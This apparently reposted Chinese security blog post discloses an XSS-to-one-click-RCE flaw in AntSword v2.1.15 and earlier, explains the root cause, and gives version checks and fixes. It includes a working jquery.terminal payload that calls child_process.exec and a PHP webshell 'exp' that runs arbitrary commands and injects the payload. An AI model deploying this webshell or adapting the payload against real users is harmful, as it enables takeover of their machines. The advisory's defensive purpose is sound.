文章总结: 文档披露蚁剑(AntSword)v2.1.15及更早版本存在高危XSS转一键RCE漏洞(CVSS8.8),攻击者可通过恶意服务端注入jquery.terminal格式码,用户点击终端链接即可触发任意命令执行。核心问题在于noxss()过滤不严与二次渲染间隙,建议立即升级至v2.1.16版本或避免点击可疑链接。 综合评分: 82 文章分类: 漏洞分析,安全工具,WEB安全,渗透测试,应急响应
蚁剑用户注意HW前记得要修复:点了一下链接,对面直接接管你电脑
原创
宝十八 宝十八
网络安全老宋
2026年4月28日 12:01 山东
在小说阅读器读本章
去阅读
导语: 你好,我是老宋。关注我,安全攻防干货准时送达!
HW前,建议AntSword升级或者卸载,别被蓝队反制哟
2026年4月24日,安全研究员 s2cr3t 在 AntSword 官方 GitHub 仓库提交了一个高危漏洞报告(Issue #370)。
简单说:你用蚁剑连了一个”有问题”的服务端,在终端里随手点了一个链接,结果你电脑就被别人接管了。
这个漏洞是怎么回事?
漏洞档案
| 项目 | 详情 | | — | — | | 漏洞类型 | XSS → 1-Click RCE | | 影响版本 | AntSword v2.1.15 及更早版本 | | CVSS 评分 | 8.8(高危) | | 利用条件 | ① 连接恶意服务端 ② 点击终端中的链接 | | 漏洞来源 | GitHub Issue #370(已修复) |
为什么这么严重?
蚁剑基于 Electron 开发,默认开启 nodeIntegration: true,渲染进程能直接调用 Node.js 的 child_process 模块。
问题出在 noxss() 函数——它只过滤了 & ' > < " 五个字符,但没管 jquery.terminal 格式码用的 [ ] ! ; : 这些字符。
攻击流程是这样的:
恶意服务端构造响应 ↓noxss() 过滤(通过了,没拦住) ↓jquery.terminal 解析格式码 ↓渲染成可点击的 javascript: 链接 ↓你点了一下 ↓calc.exe 在你电脑弹出(这只是演示) ↓黑客可以执行任意命令
payload 长这样:
[[!;;;;javascript:void(require(`child_process`).exec(`calc.exe`))]{http://localhost/phpmyadmin/}]
exp
<?php// 恶意WebShell,执行任意命令时返回包含恶意格式码的结果if(isset($_POST['ant'])){ $cmd = base64_decode($_POST['ant']); // 执行命令并获取结果 $output = shell_exec($cmd);
// 注入jquery.terminal格式码,触发1-Click RCE $malicious = '[[!;;;;javascript:void(require(`child_process`).exec(`calc.exe`))]{http://localhost/phpmyadmin/}]';
// 返回拼接后的结果 echo $output . "\n" . $malicious;}?>
看起来像普通链接,你点一下,本地就弹出计算器——能弹计算器,就能干别的事。
怎么知道自己有没有中招?
快速检查
方法一:看版本
打开蚁剑 → 左上角「AntSword」→ 「关于」 – 如果显示 v2.1.15 或更早版本 → 受影响 – 如果是 v2.1.16 → 已修复
方法二:看终端链接功能是否可用
打开虚拟终端 → 输入任意命令 → 看输出里有没有带下划线的可点击链接 – 如果有 → 说明你还没打补丁,link 解析 功能是开启状态
怎么修?
✅ 方案一:升级到最新版(推荐)
下载地址:
https://github.com/AntSwordProject/antSword/releases/tag/2.1.16
官方新增了 noxssTerminal() 函数,将 [ ] 替换为全角字符,从根本上断掉了格式码注入路径。
🟡 方案二:临时缓解
-
不连接不可信的服务端
——这是最重要的,工具再好也扛不住主动送上门
-
不要点击终端里的陌生链接
——特别是命令输出中突然出现的 URL
🟠 方案三:长期加固(适合企业环境)
修改 app.js 中的 Electron 配置:
// app.js 第58行附近webPreferences: { nodeIntegration: false, // 关闭 Node.js 直接访问 contextIsolation: true, // 启用上下文隔离}
但这个改法会影响蚁剑的部分功能,生产环境建议先测试。
老宋说
这个漏洞的本质,是一个二次渲染的安全间隙——noxss() 过滤了一次,但 jquery.terminal 又解析了一次,中间留了空档。
说实话,蚁剑这些年更新挺勤快的,这个漏洞从提交到修复只用了不到24小时,值得肯定。但工具本身的双刃剑属性不会变:你用它管服务器,黑产也在研究怎么反噬用它的人。
高频使用的工具,更要盯安全更新。这是老宋反复强调的——不是你不信蚁剑,是你的客户端环境本来就不干净。
今年不知道什么时候会开始,但是大家也要排查好自己的工具武器,别让自己成为了最薄弱的一环。
速查表
| 项目 | 说明 | | — | — | | 漏洞编号 | GitHub Issue #370 | | 危险等级 | 🟠 高危(CVSS 8.8) | | 漏洞类型 | XSS → 1-Click RCE | | 利用门槛 | 需点击链接(非自动触发) | | 影响范围 | AntSword ≤ v2.1.15 | | 修复方式 | 升级到 v2.1.16 | | 官方公告 | https://github.com/AntSwordProject/antSword/releases/tag/2.1.16 |
往期精彩
杀毒软件可能有漏洞:360和金山毒霸内核驱动高危风险
2026年国内镜像源指南:35个常用源+全场景使用方法
影子资产、ICMP打点、无文件驻留——内网渗透的三个新趋势
🔐 我是网络安全老宋
专注把安全威胁翻译成你听得懂的实操建议。每周推送漏洞预警、工具测评、攻防笔记。
如果你用蚁剑,现在就去升级,别等。
觉得有用,点个在看,转发给你身边做安全的朋友,就是对我最大的支持。
我们下期见 👋
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:网络安全老宋 宝十八 宝十八《蚁剑用户注意HW前记得要修复:点了一下链接,对面直接接管你电脑》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论